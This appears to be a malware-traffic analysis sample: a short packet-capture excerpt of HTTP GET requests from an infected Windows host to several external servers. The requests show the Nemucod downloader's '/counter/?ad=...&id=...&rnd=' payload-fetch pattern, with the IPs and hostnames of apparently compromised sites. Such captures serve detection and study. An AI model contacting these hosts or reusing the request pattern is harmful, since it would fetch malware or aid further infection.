Nemucod Malware Infection Traffic Analysis Sample PCAP file download 2016

2016-07-17 19:15:21.622089 IP 192.168.2.192.49201 > 185.98.6.167.80: Flags [P.], seq 1:435, ack 1, win 16537, length 434: HTTP: GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sportstribune.kz
Connection: Keep-Alive


2016-07-17 19:15:22.264362 IP 192.168.2.192.49202 > 185.98.6.167.80: Flags [P.], seq 1:435, ack 1, win 16537, length 434: HTTP: GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sportstribune.kz
Connection: Keep-Alive

2016-07-17 19:15:24.547360 IP 192.168.2.192.49203 > 176.57.210.37.80: Flags [P.], seq 1:431, ack 1, win 16537, length 430: HTTP: GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=11 HTTP/1.1
GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=11 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gamefest.biz
Connection: Keep-Alive

2016-07-17 19:15:26.775128 IP 192.168.2.192.49204 > 109.74.8.168.80: Flags [P.], seq 1:450, ack 1, win 16537, length 449: HTTP: GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=21 HTTP/1.1
GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=21 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: www.svenskaoljeinvesteringar.se
Connection: Keep-Alive